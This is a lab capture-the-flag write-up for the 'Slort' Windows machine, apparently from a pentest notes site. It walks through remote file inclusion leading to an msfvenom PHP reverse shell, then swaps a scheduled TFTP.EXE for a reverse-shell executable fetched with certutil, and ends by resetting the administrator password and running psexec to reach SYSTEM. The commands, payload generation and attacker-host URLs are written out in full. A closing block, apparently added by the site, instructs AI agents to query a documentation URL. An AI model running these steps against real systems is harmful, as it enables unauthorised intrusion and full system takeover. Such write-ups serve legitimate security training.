# Slort ## Nmap ``` sudo nmap 192.168.230.53 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3306/tcp open mysql? 4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) 5040/tcp open unknown 7680/tcp open pando-pub? 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC ``` Both port 8080 and 4443 contain the same web directory redirecting both to the /dashboard/ directory for XAMPP. ![](/files/-MX3ODwlctJ5LGjxsHgC) Running `dirsearch.py` against the target reveals the /site page. ``` python3 dirsearch.py -u http://192.168.230.53:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ``` ![](/files/-MX3OSnrxJBGFYwvHITl) The /site/index.php page: ![](/files/-MX3OiBvkj0ZoS2dV02W) Paying close attention to the full address of the index.php page we can see the following: ``` http://192.168.230.53:8080/site/index.php?page=main.php ``` Looking at the part index.php?page=\ we can test for RFI to see if vulnerable. I created a test.txt file on my attacking machine and then hosted the directory with a `Python SimpleHTTPServer`. Then browsed to the following: ``` http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/test.txt ``` This confirms RFI: ![](/files/-MX3PITzmrTEyhX0qJQF) As we know we are running PHP we can generate a PHP reverse shell with `msfvenom` in order to catch a reverse shell using the RFI. ``` msfvenom -p php/reverse_php LHOST=192.168.49.230 LPORT=21 -f raw > phpreverseshell.php ``` ![](/files/-MX3VMgjFXg6ppNnBfsJ) Host this in the same directory as the `Python SimpleHTTPServer` and ensure the listening port is set to 21. Then in the browser browse to the shell we just generated. ``` http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php ``` ![](/files/-MX3VfWNX0WBucH82bS7) Once we are connected we are running as the user rupert. Looking through the C:\ root directory we have a folder called backup. Looking at the contents within and reading info.txt we see that the note mentions `TFTP.EXE` is executed every 5 minutes. ![](/files/-MX3b3vfkQvfHY9KCd9-) I was able to delete `TFTP.EXE` which means we can replace it with a malicious shell. Knowing this we can generate a reverse shell with `msfvenom` and call it `TFTP.EXE`. ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.230 LPORT=21 -f exe > TFTP.EXE ``` The shell was then uploaded with `certutil.exe`. ``` certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE ``` ![](/files/-MX3bWZrP-8c5aHrvW3K) A `netcat` listener was set up on port 21 and after 5 minutes the `TFTP.EXE` was executed as part of the scheduled task and we receive an administrator shell. ![](/files/-MX3bhmQhM8NzPgOns5I) As we are administrator we can then escalate to SYSTEM by fist changing the administrator password: ``` net user administrator Password123 ``` ![](/files/-MX3lKbiiOsNcRPegllV) Then using `Psexec.py` to gain shell as SYSTEM. ``` sudo python2 psexec.py /administrator:Password123@192.168.230.53 ``` ![](/files/-MX3lSzRQubMJa1E5p5d) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/slort.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.